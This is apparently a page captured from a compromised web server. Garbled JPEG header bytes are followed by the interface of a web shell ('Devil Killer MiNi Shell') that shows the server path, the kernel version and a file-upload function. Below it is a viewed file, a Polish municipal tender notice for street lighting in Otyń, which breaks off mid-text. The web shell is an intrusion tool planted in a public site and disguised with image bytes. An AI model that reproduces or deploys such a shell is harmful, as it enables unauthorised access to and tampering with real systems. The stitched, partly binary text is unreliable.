JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210709/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210709/0011027401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00110274 z dnia 2021-07-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa oświetlenia drogi powiatowej nr 1028F relacji Bobrowniki - Otyń oraz Budowa oświetlenia drogowego w m. Niedoradz – ul. Drzewna, Krasickiego, Kwiatowa, Podgórna </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Otyń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000548471</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-106</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">683559400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">683559401</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@otyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.otyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa oświetlenia drogi powiatowej nr 1028F relacji Bobrowniki - Otyń oraz Budowa oświetlenia drogowego w m. Niedoradz – ul. Drzewna, Krasickiego, Kwiatowa, Podgórna </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26c37008-e0a5-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00110274</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001133/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa oświetlenia drogi powiatowej nr 1028F relacji Bobrowniki - Otyń</p> <p class="mb-0">1.1.8 Budowa oświetlenia drogowego w m. Niedoradz – ul. Drzewna, Krasickiego, Kwiatowa, Podgórna w formule zaprojektuj i wybuduj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal. Adres skrzynki Zamawiającego<br/>na EPUAP: /7v20fxgb5o/SkrytkaESP. Wykonawca wypełniając na miniportalu w „Formularzu do<br/>komunikacji” lub w „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” punkt „Wpisz<br/>nazwę odbiorcy” powinien wpisać: URZĄD MIEJSKI (67-106 OTYŃ, WOJ. LUBUSKIE). Dalszy opis w<br/>rozdziale X SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal (dostępne na stronie:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP).<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. W takim przypadku wykonawca uzyska dostęp do formularzy: złożenia,<br/>zmiany, wycofania oferty oraz do Formularza do komunikacji.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>Wykonawca składa ofertę, ofertę dodatkową za pośrednictwem Formularza do złożenia, zmiany,<br/>wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty<br/>wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie<br/>korespondencja związana z postępowaniem.<br/>Wszystkie oświadczenia i dokumenty dołączone do oferty w zakresie wskazanym przezZamawiającego wraz z plikami stanowiącymi ofertę wykonawca skompresuje do jednego pliku<br/>archiwum (ZIP). Po skompletowaniu oferty wykonawca jest zobowiązany podpisać ją kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym i musi zaszyfrować ofertę przy<br/>pomocy miniPortalu. Oferta będzie zapisywana w formacie .zip, następnie będzie przesyłana do<br/>Zamawiającego za pomocą dedykowanych formularzy dostępnych na ePUAP. Dalszy opis w rozdziale<br/>X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">31.1 Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Burmistrz Otynia, ul Rynek 1, 67-106 Otyń;<br/>2) Kontakt z administratorem bezpieczeństwa informacji: Marek Biedak e-mail: marek.biedak@cbi24.pl<br/>lub pisemnie na adres siedziby administratora danych osobowych;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>wypełnienia obowiązku prawnego ciążącego na administratorze, związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (t.j Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; a po tym czasie przez<br/>okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele archiwalnezgodnie<br/>z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres<br/>przechowywania 5 lat) natomiast umowa zawartą w wyniku postępowania w trybie zamówień<br/>publicznych posiada kategorię archiwalną B10 (okres przechowywania 10 lat)<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Panu danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>Dalszy opis w rozdziale XXXI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIiZP.271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 473572,46 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Część nr 1. Budowa kablowej sieci oświetleniowej niskiego napięcia 0,4 kV zlokalizowanej<br/>przy drodze powiatowej nr 1028F Zakres zadania m.in. obejmuje:<br/>a) Branża drogowa:<br/> odtworzenie nawierzchni drogi<br/>b) Roboty branży elektrycznej:<br/> budowa kablowej sieci energetycznej 0,4 kV oświetlenia ulicznego YAKY 4x35mm2,<br/> zakup oraz montaż szafki oświetleniowej,<br/> zakup oraz montaż słupów oświetleniowych, stalowych, ocynkowanych – 11 szt. o wys. 5m (6m<br/>z wysięgnikiem); 2 szt. o wysokości 6m (7m z wysięgnikiem) na fundamentach<br/>prefabrykowanych.<br/> zakup oraz montaż ledowych opraw oświetleniowych o mocy (min.) 42W, strumień świetlny<br/>opraw (min.) 5617 lm, skuteczność świetlna (min.): 133,7 lm/W – (11 szt.) oraz o mocy (min.):<br/>54W, strumień świetlny oprawy (min.): 7548 lm, skuteczność świetlna (min.): 139,8 lm/W – (2<br/>szt.), na wysięgnikach o wys. 1m, wysięg 2m, kąt nachylenia 5o<br/> Wycinkę kolidujących drzew i krzewów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 139923,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">23.1 Przy wyborze oferty najkorzystniejszej, zamawiający będzie się<br/>kierował następującymi kryteriami w odniesieniu do każdej części zamówienia, o której mowa w<br/>niniejszym SWZ:<br/>Lp. Opis kryterium oceny ofert Znaczenie<br/>1. Cena ryczałtowa brutto za całość zamówienia 60%<br/>2. Okres udzielonej gwarancji na wykonane roboty<br/>budowlane 40%<br/>Suma: 100%<br/>23.2 Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryteriów<br/>wynos i 100 pkt.<br/>23.3 Sposób obliczania punktów dla kryterium „Cena ryczałtowa brutto za całość zamówienia”.<br/>C = Cn x 60<br/>Cb<br/>Wyjaśnienie wzoru:<br/>C - kryterium „Cena ryczałtowa brutto za całość zamówienia”<br/>Cn - najniższa oferowana cena brutto spośród nie odrzuconych ofert<br/>Cb - cena brutto oferty badanej<br/>1) Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium<br/>wynosi 60 pkt. Wg wzoru:<br/>23.4 Sposób obliczania punktów dla kryterium „Okres udzielonej gwarancji na wykonane roboty<br/>budowlane”.<br/>1) Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium<br/>wynosi 40 pkt.<br/>2) Wyliczenie wartości punktowej dla kryterium okres gwarancji obliczone zostanie według poniższego<br/>wzoru według zasady:<br/>a) Okres gwarancji minimum 36 miesięcy – wykonawca otrzyma 0 pkt.<br/>b) za wydłużenie okresu gwarancji o 6 miesięcy – wykonawca otrzyma 10 pkt<br/>c) za wydłużenie okresu gwarancji o 12 miesięcy – wykonawca otrzyma 20 pkt<br/>d) za wydłużenie okresu gwarancji o 18 miesięcy – wykonawca otrzyma 30 pkt<br/>e) za wydłużenie okresu gwarancji o 24 miesiące – wykonawca otrzyma 40 pkt<br/>5) Wymagany minimalny okres gwarancji wynosi 36 miesięcy.<br/>6) W przypadku gdy Wykonawca, który zaoferuje okres gwarancji krótszy niż 36 miesięcy oferta<br/>Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść<br/>nie odpowiada treści SWZ.<br/>7) Brak wskazania w ofercie w formularzu ofertowym okresu gwarancji na roboty budowlane będzie<br/>równoznaczne z zaoferowaniem przez wykonawcę okresu gwarancji w wielkości 36 miesięcy i oferta<br/>otrzyma w tym kryterium oceny ofert 0 punktów.<br/>8) Jeżeli Wykonawca zaproponuje okres gwarancji dłuższy niż 60 miesięcy, do oceny ofert w kryterium<br/>„Okres udzielonej gwarancji na wykonane roboty budowlane” oferta otrzyma w tym kryterium oceny<br/>ofert 40 punktów.<br/>23.5 Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez<br/>Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone<br/>kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania<br/>kryterialne, przypisana zostanie proporcjonalnie mniejsza ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2) Część nr 2. Wykonanie w systemie zaprojektuj i wybuduj oświetlenia drogowego w m.<br/>Niedoradz, Gmina Otyń przy ulicach – Drzewna, Krasickiego, Kwiatowa, Podgórna. Budowa<br/>obejmie swoim zakresem następujące roboty:<br/>a) Wykonanie kompletnej dokumentacji projektowej wraz z uzyskaniem wymaganych opinii,<br/>sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów oraz koniecznym do<br/>wykonania przedmiotu zadania, wraz z wykonaniem przedmiarów oraz kosztorysów dla<br/>przedmiotowych robót. Uzyskanie decyzji pozwolenia na budowę lub zaświadczenia o braku<br/>sprzeciwu do zgłoszenia od właściwego organu administracji architektoniczno-budowlanej.<br/>b) ul. Drzewna dz. nr 94:<br/> budowa 13 odcinków linii kablowej oświetlenia ulicznego o sumarycznej długości ok. 850 mb,<br/> posadowienie słupów oświetlenia ulicznego – 13 szt.,<br/> zabudowa opraw oświetleniowych – 13 szt.,<br/> zabudowa szafki oświetleniowej dla zasilania i sterowania oświetleniem.<br/>c) ul. Krasickiego dz. nr 354/1:<br/> budowa 3 odcinków linii kablowej oświetlenia ulicznego o sumarycznej długości ok. 180 mb,<br/> posadowienie słupów oświetlenia ulicznego – 3szt.,<br/> zabudowa opraw oświetleniowych – 3 szt.,<br/> zabudowa szafki oświetleniowej dla zasilania i sterowania oświetleniem.<br/>d) ul. Kwiatowa dz. nr 337/9:<br/> budowa 2 odcinków linii kablowej oświetlenia ulicznego o sumarycznej długości ok. 120 mb,<br/> posadowienie słupów oświetlenia ulicznego – 2 szt.,<br/> zabudowa opraw oświetleniowych – 2 szt.,<br/> zabudowa szafki oświetleniowej dla zasilania i sterowania oświetleniem.<br/>e) ul. Podgórna dz. nr 27:<br/> budowa 8 odcinków linii kablowej oświetlenia ulicznego o sumarycznej długości ok. 520 mb,<br/> posadowienie słupów oświetlenia ulicznego – 8 szt.,<br/> zabudowa opraw oświetleniowych – 8 szt.,<br/>zabudowa szafki oświetleniowej dla zasilania i sterowania oświetleniem </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 333648,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">135 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">23.1 Przy wyborze oferty najkorzystniejszej, zamawiający będzie się<br/>kierował następującymi kryteriami w odniesieniu do każdej części zamówienia, o której mowa w<br/>niniejszym SWZ:<br/>Lp. Opis kryterium oceny ofert Znaczenie<br/>1. Cena ryczałtowa brutto za całość zamówienia 60%<br/>2. Okres udzielonej gwarancji na wykonane roboty<br/>budowlane 40%<br/>Suma: 100%<br/>23.2 Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryteriów<br/>wynos i 100 pkt.<br/>23.3 Sposób obliczania punktów dla kryterium „Cena ryczałtowa brutto za całość zamówienia”.<br/>C = Cn x 60<br/>Cb<br/>Wyjaśnienie wzoru:<br/>C - kryterium „Cena ryczałtowa brutto za całość zamówienia”<br/>Cn - najniższa oferowana cena brutto spośród nie odrzuconych ofert<br/>Cb - cena brutto oferty badanej<br/>1) Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium<br/>wynosi 60 pkt. Wg wzoru:<br/>23.4 Sposób obliczania punktów dla kryterium „Okres udzielonej gwarancji na wykonane roboty<br/>budowlane”.<br/>1) Maksymalna ilość 